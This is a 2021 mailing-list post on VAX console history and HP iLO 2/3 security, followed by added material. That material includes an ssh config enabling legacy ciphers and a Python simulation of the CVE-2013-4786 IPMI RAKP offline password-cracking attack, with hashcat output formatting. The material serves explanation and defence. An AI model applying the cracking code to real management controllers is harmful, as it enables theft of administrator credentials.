[Info-vax] RX2800 i4 iLO 3 firmware
Stephen Hoffman
seaohveh at hoffmanlabs.invalid
Wed Jun 23 12:58:40 EDT 2021
On 2021-06-22 23:27:16 +0000, <kemain.nospam at gmail.com> said:
> Out-of-band server management like iLOs, DRAC, including remote power
> mgmt. strategies, has been around for decades (early 1980s).
Outboard console was more of a necessity back then, as the earliest VAX
itself was comparatively, well, stupid.
The VAX-11/780 operated as a peripheral of an LSI-11, in a manner of
consideration. Boot the LSI, which then loads and boots Star and
Starlet.
Later VAX systems got somewhat smarter.
Remote management was something comparatively new for OpenVMS folks,
first arriving with Itanium for many of the OpenVMS sites around.
> VAX Nautilus and Polarstar systems used external PRO-350/380 PC systems
> to manage (including Poff/Pon, searchable soft log files) VAX systems.
The Nautilus family used Pro 350 and Pro 380 hardware, with those boxes
renamed as VAX console. The Polarstar family used a MicroVAX II as the
console. The MicroVAX was one of the distinguishing features of
Polarstar. VAX-11/780 used an LSI-11, as mentioned above. The VAX 9000
service processor unit consisted of 4 MicroVAX II processors. Alpha
eventually added RCM and RMC hardware outboard, all the way up to the
entirely gonzo server management network present within the
Marvel-class AlphaServer boxes; AlphaServer GS1280, etc.
IBM used last year's mainframe model as this year's channel controller,
as that old joke went, and analogous jokes were told about VAX consoles.
None of these VAX and Alpha consoles was supported for remote Ethernet
network access, with the gear supporting remote serial access at best.
Early on, this serial access was intended for DEC Field Service to dial
in (modems, remember those?) and diagnose the server.
Yes, some older sites did routinely use terminal servers as a
workaround for remote console access, or used a console app such as
VAXcluster Console System (VCS) or Minicom and serial cabling, or
screen/tmux, etc. And I've remotely tapped into the Marvel internal
network, as have others. These were wildly insecure, by present-day
standards.
HP and HPE iLO, Dell iDRAC, the SuperMicro BMC, and various other
available gear all substantially improve on what the older server
consoles could do, though. Particularly around remote management and
monitoring and automation, and with far better support for server
installation. And with better connection security. (Usually. Somewhat.
See below.)
For lower-end boxes, Intel vPro and AMD Pro management access is
available from various vendors.
iLO 2 and iLO 3 are hardware limited, which reportedly constrains
what is possible with the hardware, and they are nowadays best kept
isolated. There are exploits against these, including the CVE-2013-4786
vulnerability.
"There is no resolution to this issue. The authentication process for
the IPMI 2.0 specification mandates that the server send a salted SHA1
or MD5 hash of the requested user's password to the client, prior to
the client authenticating. The BMC returns the password hash for any
valid user account requested. This password hash can be broken using an
offline brute force or dictionary attack. Because this functionality is
a key part of the IPMI 2.0 specification, there is no way to fix the
problem without deviating from the IPMI 2.0 specification."
Meaning you will want to disable IPMI ( MP:CM> sa -lanipmi d ) if
you're not using it, and not on a constrained-access management network.
And another reason for isolation: iLO 2 and iLO 3 ssh security is badly
down-revision, which means connecting using something similar to this:
ssh -o HostKeyAlgorithms=ssh-rsa,ssh-dss \
    -o KexAlgorithms=diffie-hellman-group1-sha1 \
    -o Ciphers=aes128-cbc,3des-cbc \
    -o MACs=hmac-md5,hmac-sha1 User@Server.Example.Com
--
Pure Personal Opinion | HoffmanLabs LLC
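The legacy-algorithm ssh invocation above, rewritten as an added ~/.ssh/config stanza (my example, not from the original post) so the weakened algorithm lists apply only to the one iLO host instead of every connection. Host alias, hostname and user are placeholders.

```sshconfig
# Scope the down-revision algorithms to the iLO alone; every other host keeps
# the OpenSSH defaults. The "+" form appends to the default list rather than
# replacing it (OpenSSH 7.0 and later).
Host ilo-rx2800
    HostName ilo.example.com
    User Administrator
    HostKeyAlgorithms +ssh-rsa,ssh-dss
    KexAlgorithms +diffie-hellman-group1-sha1
    Ciphers +aes128-cbc,3des-cbc
    MACs +hmac-md5,hmac-sha1
```

Then `ssh ilo-rx2800` picks all of that up. Recent OpenSSH releases have removed DSA support outright, in which case `ssh-dss` is rejected as an unknown algorithm and has to be dropped from the list; `ssh -G ilo-rx2800` shows the effective settings without connecting. Group1 key exchange, CBC ciphers and MD5 MACs are being enabled here, so this stanza is one more reason the iLO belongs on an isolated management network and nowhere else.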
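The RAKP weakness quoted above (CVE-2013-4786), as an added worked example that is not code from the original post, from HPE, or from any BMC vendor. It simulates both ends of the IPMI 2.0 RAKP message 1/2 exchange locally with constructed credentials and random session material, then runs the offline dictionary attack the advisory describes. The field order of the authenticated data follows the IPMI 2.0 RAKP-HMAC-SHA1 definition as I understand it; the attack does not depend on that order, only on every field except the password being visible on the wire. The class and function names are my own.

```python
"""Offline attack on the IPMI 2.0 RAKP message 2 authentication code (CVE-2013-4786).

Added example: simulates a BMC and a console locally; nothing touches a network.
"""
import hashlib
import hmac
import os
import struct

ADMIN_PRIV = 4  # IPMI privilege level 4 = Administrator


def rakp2_salt(sid_rm, sid_c, r_m, r_c, guid_c, role_m, username):
    """Bytes the BMC authenticates in RAKP message 2 (RAKP-HMAC-SHA1):
    SID_Rm || SID_C || R_M || R_C || GUID_C || Role_M || ULength_M || UName_M.
    Session IDs are little-endian like other IPMI multi-byte fields.
    Every one of these values crosses the wire in clear; only the key is secret."""
    uname = username.encode()
    return (struct.pack("<II", sid_rm, sid_c) + r_m + r_c + guid_c
            + bytes([role_m, len(uname)]) + uname)


def rakp2_auth_code(password, salt):
    """K_UID is the user's password (the spec zero-pads it to 20 bytes; HMAC
    zero-pads short keys itself, so the unpadded password yields the same tag)."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


class SimulatedBMC:
    """Stand-in for a BMC's RAKP handling. Credentials are constructed sample data."""

    def __init__(self, users):
        self._users = users          # username -> password
        self.guid = os.urandom(16)   # GUID_C, normally a fixed per-board value

    def rakp2(self, sid_rm, r_m, username, role_m):
        """Answer RAKP message 1. This is the flaw the advisory describes: for any
        valid user name the BMC hands back an HMAC keyed by that user's password
        before the console has proven anything, i.e. an offline-crackable hash."""
        password = self._users.get(username)
        if password is None:
            return None  # unknown user: no authentication code issued
        sid_c = struct.unpack("<I", os.urandom(4))[0]  # BMC-chosen session ID
        r_c = os.urandom(16)                            # BMC random number
        salt = rakp2_salt(sid_rm, sid_c, r_m, r_c, self.guid, role_m, username)
        return sid_c, r_c, self.guid, rakp2_auth_code(password, salt)


def crack_rakp2(username, role_m, sid_rm, r_m, response, wordlist):
    """Offline dictionary attack: recompute the tag for each candidate password
    over the captured public fields and compare. Returns the password or None."""
    sid_c, r_c, guid_c, code = response
    salt = rakp2_salt(sid_rm, sid_c, r_m, r_c, guid_c, role_m, username)
    for candidate in wordlist:
        if hmac.compare_digest(rakp2_auth_code(candidate, salt), code):
            return candidate
    return None


def hashcat_7300_line(username, role_m, sid_rm, r_m, response):
    """Same material as a salt_hex:hmac_hex line, the form hashcat mode 7300
    (IPMI2 RAKP HMAC-SHA1) consumes, so a real capture can go to a GPU cracker."""
    sid_c, r_c, guid_c, code = response
    salt = rakp2_salt(sid_rm, sid_c, r_m, r_c, guid_c, role_m, username)
    return salt.hex() + ":" + code.hex()


def demo(wordlist=("password", "admin", "changeme", "Winter2021", "hunter2")):
    """Run the whole exchange against the simulated BMC; returns the recovered password."""
    bmc = SimulatedBMC({"Administrator": "Winter2021"})  # constructed credential
    sid_rm, r_m = 0xA0A1A2A3, os.urandom(16)  # console session ID and random number
    response = bmc.rakp2(sid_rm, r_m, "Administrator", ADMIN_PRIV)
    return crack_rakp2("Administrator", ADMIN_PRIV, sid_rm, r_m, response, wordlist)


if __name__ == "__main__":
    print("recovered password:", demo())
```

The point to take from running it: the console never has to know the password to obtain the HMAC, so password strength is the only defence left inside the protocol, which is why the post's advice is to switch IPMI-over-LAN off or confine it to an isolated management network rather than to wait for a firmware fix.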